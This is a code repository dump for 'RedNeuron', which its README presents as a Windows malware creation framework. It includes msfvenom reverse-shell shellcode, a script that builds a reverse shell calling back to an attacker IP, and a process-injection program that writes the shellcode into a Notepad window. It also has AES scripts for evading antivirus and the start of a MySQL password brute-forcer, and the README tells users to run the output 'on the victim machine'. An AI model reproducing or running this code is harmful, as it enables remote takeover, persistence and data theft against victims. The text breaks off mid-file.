├── .github
│   └── FUNDING.yml
├── README.md
├── RedNeuron
├── code
│   ├── ColorClass.h
│   ├── PEstructs.h
│   ├── RedNeuron
│   ├── WindowInjector
│   │   ├── WindowsInjector.sh
│   │   ├── code
│   │   │   ├── shellcode.c
│   │   │   └── windowname.txt
│   │   ├── src
│   │   │   ├── banner.sh
│   │   │   ├── copyshellcode.py
│   │   │   ├── shellcodegen.sh
│   │   │   ├── windowinjector.cpp
│   │   │   └── windowinjector2.cpp
│   │   └── windowinjector.exe
│   ├── aesencrypt.py
│   ├── aesencrypt2.py
│   ├── banner.sh
│   ├── bruteforce
│   │   ├── mysql
│   │   │   ├── SQL.h
│   │   │   ├── WordlistToVector.h
│   │   │   ├── bruteMySQL
│   │   │   ├── bruteMySQL.cpp
│   │   │   ├── utils
│   │   │   │   ├── ColorClass.h
│   │   │   │   ├── WordlistToVector.h
│   │   │   │   └── colors.h
│   │   │   └── wordlist.txt
│   │   └── ssh
│   │       ├── .vscode
│   │       │   └── tasks.json
│   │       ├── Banner.h
│   │       ├── BruteForce.cpp
│   │       ├── Host.cpp
│   │       ├── Host.h
│   │       ├── Utils
│   │       │   ├── ColorClass.h
│   │       │   └── WordlistToVector.h
│   │       ├── bruteSSH
│   │       └── wordlist.txt
│   ├── checks.sh
│   ├── create.h
│   ├── helpers.cpp
│   ├── helpers.h
│   ├── mainshell.h
│   ├── menus.h
│   ├── msfvenom.sh
│   ├── persistence
│   │   ├── check.sh
│   │   ├── runkeys.cpp
│   │   └── runkeys2.cpp
│   ├── postexploitation
│   │   ├── MySQL-dataStealer
│   │   │   ├── MySQL_DataStealer.sh
│   │   │   ├── cg.exe
│   │   │   ├── libmysql.dll
│   │   │   ├── server
│   │   │   └── sqlop.exe
│   │   ├── file-extractor
│   │   │   ├── client
│   │   │   ├── file-extractor.sh
│   │   │   ├── fileExtractor.exe
│   │   │   └── server
│   │   ├── keylogger
│   │   │   ├── keylogger.cpp
│   │   │   ├── keylogger.exe
│   │   │   └── keylogger.sh
│   │   └── postExpShell.h
│   ├── proclist
│   │   ├── ProcList.cpp
│   │   ├── procList.exe
│   │   └── proclist.sh
│   ├── revshell.cpp
│   ├── revshell2.cpp
│   ├── runkeys.cpp
│   ├── shell.h
│   ├── shellcode.c
│   ├── temp.raw
│   └── windowname.txt
├── redneuron.cpp
└── redneuron.zip
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
patreon: # Replace with a single Patreon username
open_collective: # Replace with a single Open Collective username
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: # Replace with a single Liberapay username
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
custom: https://medium.com/@s12deff/membership
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# RedNeuron

RedNeuron is a malware creation framework. The malware it creates is aimed at Windows machines, but the framework itself is built to run on Linux; you can use it on any Linux distribution as long as the required dependencies are installed.

If you want to collaborate with code or ideas, you can contact me at s12deff@gmail.com.

If you want to support the development of this tool financially, you can buy a subscription on Medium:
https://medium.com/@s12deff/membership

It is developed on a Kali Linux machine and tested on Kali, Athena OS, Ubuntu and Parrot OS.
Currently, in version 1.6, the six malware options available to create are: an Undetectable Reverse Shell that bypasses Windows Defender, a persistence file using the Run registry key, a ProcList tool that lists all processes, a FindWindow tool that injects a reverse shell into a remote process via that process's window name, a MySQL Data Stealer using triggers and a C2 server, and the latest tool inside RedNeuron, File Extractor. These tools are developed mainly in three languages:
- C++
- Python
- Bash

The tool has a shell to move around inside RedNeuron; at the moment it only has three sections:
- Main
- Create
- PostExploitation

Future malware tools:
- C2 Server
- KeyLogger
- Ransomware

![image](https://user-images.githubusercontent.com/79543461/210807455-2dae7b7f-884d-47de-81c3-0f9bde1cbc27.png)

# Installation

**Clone this repository:**

    git clone https://github.com/S12cybersecurity/RedNeuron

**Install requirements:**

    apt update && apt install python2 && apt install g++-mingw-w64

**If you don't have Metasploit, you need to install it.**

Guide: https://adamtheautomator.com/install-metasploit-on-ubuntu/

**Set RedNeuron as executable:**

    chmod +x RedNeuron

**Python2 requirements:**

    wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

    python2 get-pip.py

    pip2 install pycryptodome

**Compile**

The code is already compiled, but if you want to compile it yourself, run this command:

    gcc redneuron.cpp -lstdc++ -Wwrite-strings -o RedNeuron

# Usage

Execute ./RedNeuron

![image](https://user-images.githubusercontent.com/79543461/210810523-37e7a677-3bfd-45d6-8c0e-a5fc23fd1d6b.png)

If you want to create malware, execute the create command:

![image](https://user-images.githubusercontent.com/79543461/212728043-bdabe8f2-056f-4fcf-ae2d-9cab650b82be.png)

With the list command you can see all available malware:

![image](https://user-images.githubusercontent.com/79543461/212728136-0e453634-f5ce-4380-9174-10eb994d4aa8.png)

Create Undetectable Windows Reverse Shell:

![image](https://user-images.githubusercontent.com/79543461/210821342-e18e2053-c7c7-404f-9313-03f2d2a8c32b.png)

Create Windows Persistence File:

![image](https://user-images.githubusercontent.com/79543461/212728269-3ce8ae5e-d3a0-431e-98b0-7cf70ebe4909.png)

Create ProcList EXE:

![image](https://user-images.githubusercontent.com/79543461/218328334-b994a2f6-1283-4230-9134-1f47cb4087f8.png)

Now execute it on the victim machine!

WindowInjector

Run the WindowInjector command:

![image](https://user-images.githubusercontent.com/79543461/226188793-a9331bb9-2009-48db-819f-7201132ef2a2.png)

![image](https://user-images.githubusercontent.com/79543461/226188830-cd5ee493-0e8a-49b1-96c4-22c79c1d3820.png)

And now execute it on the victim machine:

![image](https://user-images.githubusercontent.com/79543461/226189011-ae56b779-04d4-47e6-9376-d4db58eef477.png)

![image](https://user-images.githubusercontent.com/79543461/226189018-dbd3a2b2-4d34-4a1f-b70f-26c7242828c2.png)

And get the reverse shell:

![image](https://user-images.githubusercontent.com/79543461/226189038-42d267da-c474-4014-8cce-aef371dfc855.png)

File Extractor

First enter the postexploitation shell:

![image](https://user-images.githubusercontent.com/79543461/228027276-db18e423-7dac-4095-a97f-dea15d308e95.png)

Then execute the file-extractor command:

![image](https://user-images.githubusercontent.com/79543461/228027780-2c03032c-6f8d-4e6e-9fe7-5cd6c35f3cca.png)

Now you have in your directory the exe to execute on the Windows machine to transfer a file to RedNeuron.

You only need to provide the requested information, and it starts listening:

![image](https://user-images.githubusercontent.com/79543461/228028022-aedea961-05f0-4039-a065-51cc9ec32196.png)

And on the Windows machine execute it:

![image](https://user-images.githubusercontent.com/79543461/228028227-9b86f83c-8ec6-4094-b0c8-366fe9fbec2c.png)

![image](https://user-images.githubusercontent.com/79543461/228034894-6f593e68-95b6-46eb-9253-3500de17a459.png)

And here you have your transferred file.

MySQL Data Stealer:

First of all, this tool is post-exploitation; to enter it we need to execute the postexploitation command:

![image](https://user-images.githubusercontent.com/79543461/229364424-e508f76c-55c7-4a36-848b-17200abe6e2d.png)

And now execute mysql-stealer:

![image](https://user-images.githubusercontent.com/79543461/229364439-faf23136-1814-422c-946c-3746a89cd96a.png)

To use it you can check this Medium post about it!
https://medium.com/@s12deff/mysql-data-stealer-hacking-mysql-26b960bb7d10
--------------------------------------------------------------------------------
/RedNeuron:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/RedNeuron
--------------------------------------------------------------------------------
/code/ColorClass.h:
--------------------------------------------------------------------------------
#include <iostream>
#include <string>

using namespace std;

// Each helper prints the text in one ANSI colour and then resets the terminal colour.
void red(string text)
{
    cout << "\033[31m" << text << "\033[0m";
}
void blue(string text)
{
    cout << "\033[34m" << text << "\033[0m";
}
void yellow(string text)
{
    cout << "\033[33m" << text << "\033[0m";
}
void black(string text)
{
    cout << "\033[30m" << text << "\033[0m";
}
void green(string text)
{
    cout << "\033[32m" << text << "\033[0m";
}
void cyan(string text)
{
    cout << "\033[36m" << text << "\033[0m";
}
--------------------------------------------------------------------------------
/code/PEstructs.h:
--------------------------------------------------------------------------------
#pragma once

#include <windows.h>

//https://processhacker.sourceforge.io/doc/ntpsapi_8h_source.html#l00063
struct PEB_LDR_DATA
{
    ULONG Length;
    BOOLEAN Initialized;
    HANDLE SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID EntryInProgress;
    BOOLEAN ShutdownInProgress;
    HANDLE ShutdownThreadId;
};
//https://processhacker.sourceforge.io/doc/ntpebteb_8h_source.html#l00008
struct PEB
{
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union
    {
        BOOLEAN BitField;
        struct
        {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN IsPackagedProcess : 1;
            BOOLEAN IsAppContainer : 1;
            BOOLEAN IsProtectedProcessLight : 1;
            BOOLEAN SpareBits : 1;
        };
    };
    HANDLE Mutant;
    PVOID ImageBaseAddress;
    PEB_LDR_DATA* Ldr;
    //...
};

struct UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWCH Buffer;
};

//https://processhacker.sourceforge.io/doc/ntldr_8h_source.html#l00102
struct LDR_DATA_TABLE_ENTRY
{
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    union
    {
        LIST_ENTRY InInitializationOrderLinks;
        LIST_ENTRY InProgressLinks;
    };
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    //...
68 | }; -------------------------------------------------------------------------------- /code/RedNeuron: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/RedNeuron -------------------------------------------------------------------------------- /code/WindowInjector/WindowsInjector.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | 3 | bash code/WindowInjector/src/banner.sh 4 | -------------------------------------------------------------------------------- /code/WindowInjector/code/shellcode.c: -------------------------------------------------------------------------------- 1 | unsigned char buf[] = 2 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 3 | "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" 4 | "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" 5 | "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" 6 | "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" 7 | "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" 8 | "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" 9 | "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" 10 | "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" 12 | "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" 13 | "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 14 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 15 | "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" 16 | "\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" 17 | "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00" 18 | "\x00\x49\x89\xe5\x49\xbc\x02\x00\x04\xbc\xc0\xa8\x00\x87" 19 | "\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" 20 | 
"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29" 21 | "\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48" 22 | "\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea" 23 | "\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" 24 | "\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81" 25 | "\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00" 26 | "\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0" 27 | "\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" 28 | "\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41" 29 | "\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d" 30 | "\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48" 31 | "\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" 32 | "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5" 33 | "\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 34 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; 35 | -------------------------------------------------------------------------------- /code/WindowInjector/code/windowname.txt: -------------------------------------------------------------------------------- 1 | Untitled - Notepad 2 | -------------------------------------------------------------------------------- /code/WindowInjector/src/banner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | 10 | compiler_exists() { 11 | if which x86_64-w64-mingw32-g++ >/dev/null; then 12 | echo true 13 | else 14 | echo false 15 | fi 16 | } 17 | 18 | payload_creator_exists() { 19 | if which msfvenom >/dev/null; then 20 | echo true 21 | else 22 | echo false 23 | fi 24 | } 25 | 26 | echo -e "${YELLOW}[+] Checking Dependencies...${ENDCOLOR}\n" 27 | 28 | if [ "$(compiler_exists)" == true ] && [ "$(payload_creator_exists)" == true ]; then 29 | echo -e "${GREEN}[+] Dependencies Found ${ENDCOLOR}" 30 
| sleep 3s 31 | clear 32 | else 33 | echo -e "${RED}[-] Some Dependencies not Found${ENDCOLOR}" 34 | if [ "$(compiler_exists)" == false ]; then 35 | echo -e "You can install the compiler with: sudo apt-get install g++-mingw-w64" 36 | fi 37 | if [ "$(payload_creator_exists)" == false ]; then 38 | echo -e "You can install the payload creator following this guide: https://adamtheautomator.com/install-metasploit-on-ubuntu/" 39 | fi 40 | exit 41 | fi 42 | 43 | 44 | echo -e "${RED} 45 | _ _ _ _ _ _____ _ _ 46 | | | | |_|___ _| |___ _ _ _ | |___ |_|___ ___| |_ ___ ___ 47 | | | | | | | . | . | | | | |- -| | | | -_| _| _| . | _| 48 | |_____|_|_|_|___|___|_____| |_____|_|_|_| |___|___|_| |___|_| 49 | |___| ${ENDCOLOR}\n" 50 | 51 | echo -e "${RED}\t\t Created by S12 <-> Salsa${ENDCOLOR}" 52 | 53 | bash code/WindowInjector/src/shellcodegen.sh 54 | -------------------------------------------------------------------------------- /code/WindowInjector/src/copyshellcode.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | with open('code/WindowInjector/src/windowinjector2.cpp', 'r') as f: 4 | content = f.read() 5 | 6 | with open('code/WindowInjector/code/shellcode.c', 'r') as f: 7 | replacement = f.read() 8 | 9 | content = content.replace('PAYLOAD_HERE', replacement) 10 | 11 | with open('code/WindowInjector/src/windowinjector2.cpp', 'w') as f: 12 | f.write(content) 13 | 14 | with open('code/WindowInjector/src/windowinjector2.cpp', 'r') as f: 15 | content = f.read() 16 | 17 | with open('code/WindowInjector/code/windowname.txt', 'r') as f: 18 | replacement = f.read().rstrip() 19 | 20 | content = content.replace('WINDOW_HERE', replacement) 21 | 22 | with open('code/WindowInjector/src/windowinjector2.cpp', 'w') as f: 23 | f.write(content) 24 | 25 | -------------------------------------------------------------------------------- /code/WindowInjector/src/shellcodegen.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | echo -e "${YELLOW}\n[+] Create Windows Reverse Shell \nProvide the following information about YOUR attacker machine${ENDCOLOR}\n" 10 | printf "IP = " 11 | read -r ip 12 | printf "PORT = " 13 | read -r port 14 | printf "Window Name to Inject Shell = " 15 | read -r windowname 16 | 17 | 18 | echo $windowname > code/windowname.txt 19 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ip LPORT=$port -f c -o code/WindowInjector/code/shellcode.c >/dev/null 20 | cp code/WindowInjector/src/windowinjector.cpp code/WindowInjector/src/windowinjector2.cpp 2>/dev/null 21 | python3 code/WindowInjector/src/copyshellcode.py 22 | 23 | x86_64-w64-mingw32-g++ code/WindowInjector/src/windowinjector2.cpp -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -o windowinjector.exe -fpermissive 2 2 | #include 3 | #include 4 | 5 | PAYLOAD_HERE 6 | 7 | int main() { 8 | 9 | HANDLE ph; 10 | HANDLE rt; 11 | DWORD pid; 12 | 13 | // find a window for mspaint.exe 14 | HWND hw = FindWindow(NULL, (LPCSTR) "WINDOW_HERE"); 15 | if (hw == NULL) { 16 | printf("failed to find window :(\n"); 17 | return -2; 18 | } 19 | GetWindowThreadProcessId(hw, &pid); 20 | ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 21 | 22 | LPVOID rb = VirtualAllocEx(ph, NULL, sizeof(buf), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 23 | WriteProcessMemory(ph, rb, buf, sizeof(buf), NULL); 24 | 25 | rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL); 26 | CloseHandle(ph); 27 | 28 | return 0; 29 | } -------------------------------------------------------------------------------- /code/WindowInjector/src/windowinjector2.cpp: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | unsigned char buf[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" 7 | "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" 8 | "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" 9 | "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" 10 | "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" 11 | "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" 12 | "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" 13 | "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" 14 | "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" 15 | "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" 16 | "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" 17 | "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" 18 | "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" 19 | "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" 20 | "\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33" 21 | "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00" 22 | "\x00\x49\x89\xe5\x49\xbc\x02\x00\x04\xbc\xc0\xa8\x00\x87" 23 | "\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" 24 | "\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29" 25 | "\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48" 26 | "\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea" 27 | "\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" 28 | "\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81" 29 | "\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00" 30 | "\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0" 31 | "\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" 32 | "\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41" 33 | "\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d" 34 | 
"\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48" 35 | "\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff" 36 | "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5" 37 | "\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 38 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"; 39 | 40 | 41 | int main() { 42 | 43 | HANDLE ph; 44 | HANDLE rt; 45 | DWORD pid; 46 | 47 | // find a window for mspaint.exe 48 | HWND hw = FindWindow(NULL, (LPCSTR) "Untitled - Notepad"); 49 | if (hw == NULL) { 50 | printf("failed to find window :(\n"); 51 | return -2; 52 | } 53 | GetWindowThreadProcessId(hw, &pid); 54 | ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 55 | 56 | LPVOID rb = VirtualAllocEx(ph, NULL, sizeof(buf), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 57 | WriteProcessMemory(ph, rb, buf, sizeof(buf), NULL); 58 | 59 | rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)rb, NULL, 0, NULL); 60 | CloseHandle(ph); 61 | 62 | return 0; 63 | } -------------------------------------------------------------------------------- /code/WindowInjector/windowinjector.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/WindowInjector/windowinjector.exe -------------------------------------------------------------------------------- /code/aesencrypt.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from Crypto.Cipher import AES 3 | from os import urandom 4 | import hashlib 5 | 6 | KEY = urandom(16) 7 | 8 | def pad(s): 9 | return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) 10 | 11 | def aesenc(plaintext, key): 12 | 13 | k = hashlib.sha256(key).digest() 14 | iv = 16 * '\x00' 15 | plaintext = pad(plaintext) 16 | cipher = AES.new(k, AES.MODE_CBC, iv) 17 | 18 | return cipher.encrypt(bytes(plaintext)) 19 | 20 
| 21 | 22 | try: 23 | plaintext = open(sys.argv[1], "rb").read() 24 | except: 25 | print(("File argument needed! %s " % sys.argv[0])) 26 | sys.exit() 27 | 28 | 29 | 30 | ciphertext = aesenc(plaintext, KEY) 31 | key = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };' 32 | payload = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };' 33 | 34 | 35 | 36 | f = open("code/revshell2.cpp", "r") 37 | 38 | with open('code/revshell2.cpp', 'r') as file : 39 | filedata = file.read() 40 | 41 | filedata = filedata.replace('payloadaes', payload) 42 | 43 | with open('code/revshell2.cpp', 'w') as file: 44 | file.write(filedata) 45 | 46 | f = open("code/revshell2.cpp", "r") 47 | 48 | filedata = filedata.replace('KEYAES', key) 49 | 50 | with open('code/revshell2.cpp', 'w') as file: 51 | file.write(filedata) 52 | -------------------------------------------------------------------------------- /code/aesencrypt2.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from Crypto.Cipher import AES 3 | from os import urandom 4 | import hashlib 5 | import pandas as pd 6 | data = pd.read_csv(sys.argv[1], encoding= 'unicode_escape') 7 | 8 | KEY = urandom(16) 9 | 10 | def pad(s): 11 | return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) 12 | 13 | def aesenc(plaintext, key): 14 | 15 | k = hashlib.sha256(key).digest() 16 | iv = 16 * '\x00' 17 | plaintext = pad(plaintext) 18 | cipher = AES.new(k, AES.MODE_CBC, iv) 19 | 20 | return cipher.encrypt(bytes(plaintext)) 21 | 22 | 23 | plaintext = open(sys.argv[1], "r").read() 24 | 25 | ciphertext = aesenc(plaintext, KEY) 26 | key = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };' 27 | payload = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };' 28 | 29 | 30 | 31 | f = open("revshell2.cpp", "r") 32 | 33 | with open('revshell2.cpp', 'r') as file : 34 | filedata = file.read() 35 | 36 | filedata = 
filedata.replace('payloadaes', payload) 37 | 38 | with open('revshell2.cpp', 'w') as file: 39 | file.write(filedata) 40 | 41 | f = open("revshell2.cpp", "r") 42 | 43 | filedata = filedata.replace('KEYAES', key) 44 | 45 | with open('revshell2.cpp', 'w') as file: 46 | file.write(filedata) 47 | -------------------------------------------------------------------------------- /code/banner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | RED="\e[31m" 5 | GREEN="\e[32m" 6 | YELLOW="\e[33m" 7 | BLUE="\e[34m" 8 | ENDCOLOR="\e[0m" 9 | 10 | 11 | echo -e "${RED} 12 | _____ _ ___ _ 13 | | __ |___ _| | | | |___ _ _ ___ ___ ___ 14 | | -| -_| . | | | | | -_| | | _| . | | 15 | |__|__|___|___| |_|___|___|___|_| |___|_|_| 16 | ${ENDCOLOR}" -------------------------------------------------------------------------------- /code/bruteforce/mysql/SQL.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | //connect to mysql database 6 | class SQL{ 7 | private: 8 | std::string server; 9 | std::string user; 10 | std::string password; 11 | std::string database; 12 | MYSQL *conn; 13 | 14 | public: 15 | SQL(std::string server, std::string user, std::string password, std::string database){ 16 | this->server = server; 17 | this->user = user; 18 | this->password = password; 19 | this->database = database; 20 | } 21 | 22 | // getters and setters 23 | std::string getServer(){ 24 | return server; 25 | } 26 | void setServer(std::string server){ 27 | this->server = server; 28 | } 29 | std::string getUser(){ 30 | return user; 31 | } 32 | void setUser(std::string user){ 33 | this->user = user; 34 | } 35 | std::string getPassword(){ 36 | return password; 37 | } 38 | void setPassword(std::string password){ 39 | this->password = password; 40 | } 41 | std::string getDatabase(){ 42 | return database; 43 | } 44 | void setDatabase(std::string database){ 45 | this->database 
= database; 46 | } 47 | 48 | bool connect(){ 49 | //CONNECTION TO MYSQL DATABASE 50 | MYSQL_RES *res; 51 | MYSQL_ROW row; 52 | conn = mysql_init(nullptr); 53 | if(!mysql_real_connect(conn, server.c_str(), user.c_str(), password.c_str(), database.c_str(), 0, nullptr, 0)){ 54 | return false; 55 | } 56 | else{ 57 | return true; 58 | } 59 | } 60 | }; 61 | -------------------------------------------------------------------------------- /code/bruteforce/mysql/WordlistToVector.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | vector readPasswordsFromFile(string fileName) { 8 | vector passwords; 9 | ifstream file(fileName); 10 | if (file.is_open()) { 11 | string line; 12 | while (getline(file, line)) { 13 | passwords.push_back(line); 14 | } 15 | } 16 | else { 17 | cout << "Error opening file: " << fileName << endl; 18 | } 19 | return passwords; 20 | } -------------------------------------------------------------------------------- /code/bruteforce/mysql/bruteMySQL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/bruteforce/mysql/bruteMySQL -------------------------------------------------------------------------------- /code/bruteforce/mysql/bruteMySQL.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "SQL.h" 4 | #include 5 | #include 6 | #include 7 | #include "utils/WordlistToVector.h" 8 | 9 | using namespace std; 10 | 11 | int main(){ 12 | bool result; 13 | 14 | cout << "\n\tMySQL Brute Force\n" << endl; 15 | 16 | string file = ""; 17 | string user = ""; 18 | string server = ""; 19 | int intentos = 1; 20 | 21 | cout << "Server: "; 22 | cin >> server; 23 | 24 | cout << "Path of Wordlist: "; 25 | cin >> file; 26 | 27 | cout << 